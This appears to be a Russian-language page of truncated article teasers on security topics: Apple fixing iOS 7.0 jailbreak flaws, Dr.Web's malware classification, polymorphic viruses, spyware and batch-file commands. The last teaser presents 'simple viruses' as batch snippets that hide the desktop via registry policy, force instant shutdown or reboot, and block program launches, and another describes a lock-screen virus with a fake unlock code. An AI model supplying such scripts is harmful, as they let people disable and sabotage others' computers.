Компания Apple поблагодарила участников хакерской группы Evad3rs за обнаружение множества уязвимостей в iOS 7.0. Именно работа хакеров позволила разработчикам американской корпорации устранить все существующие бреши и представить пользователям iOS 7.1. Напомним, что осуществление джейлбрейка на устройстве пользователя предоставляет ему возможность загружать программы сторонних производителей, а не только с App Store. Джейлбрейк способен использовать бреши в iOS, однако опасность состоит в том, что обнаруженные уязвимости также могут быть использованы в злонамеренных целях. В связи с этим Apple стремится закрывать их в кратчайшие сроки. Согласно информации Apple, в iOS 7.1 были устранены бреши, обнаруженные независимыми разработчиками, корпоративными IT-специалистами и даже кон ... Читать дальше » |
Антивирусная лаборатория "Доктор Веб" строит классификацию компьютерных вредоносных программ следующим образом: 1. Вредоносные программы, cетевые атаки и виды интернет - мошенничества: Атаки методом подбора пароля (Brute force attacks) — так называемые атаки методом "грубой силы". Как правило, пользователи применяют простейшие пароли, например "123", "admin" и т.д. Этим и пользуются компьютерные злоумышленники, которые при помощи специальных троянских программ вычисляют необходимый для проникновения в сеть пароль методом подбора - на основании заложенного в эту программу словаря паролей или генерируя случайные последовательности символов. 2. Бомбы с часовыми механизмами (Time bombs) — одна из разновидностей логических бомб, в которых срабатывание скрытого мо ... Читать дальше » |
1. Полиморфные вирусы (Polymorphic viruses) - или вирусы с самомодифицирующимися расшифровщиками - вирусы, использующие помимо шифрования кода специальную процедуру расшифровки, изменяющую саму себя в каждом новом экземпляре вируса, что ведет к отсутствию у него байтовых сигнатур. Расшифровщик не является постоянным - он уникален для каждого экземпляра вируса. 2. MtE вирусы (MtE viruses) - полиморфные вирусы, созданные с помощью генератора полиморфизма MtE (Mutant Engine). Такой генератор представляет собой специальный алгоритм, который отвечает за функции шифровки / расшифровки и генерацию расшифровщиков и присоединяется к любому объектному коду вируса. Такой расшифровщик не имеет ни одного постоянного бита, длина его всегда разная. 3. Pезидентный (в памяти) вирус (Memory resident virus) - постоянно присутствующий в памяти вирус, написанный, как прав ... Читать дальше » |
Шпионским программным обеспечением называются любые программы, которые следят за использованием компьютера, собирают информацию или извлекают конфиденциальные данные без явного согласия пользователя. Например, шпионская программа может запоминать посещаемые пользователем Web-узлы и время посещений, регистрировать все нажатия на клавиши или выполнять несанкционированную инвентаризацию установленного программного обеспечения. |
Это команды,которые используются для BAT файлов. ASSOC - Отображает или модифицирует связи расширений файлов |
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует) |
Простенькие вирусы Убирает рабочий стол @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul Выключается компьютер @echo off shutdown -s -t 1 -c "lol" >nul Перезагрузка компьютера @echo off shutdown -r -t 1 -c "lol" >nul Запрещает запускать программы @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Restric ... Читать дальше » |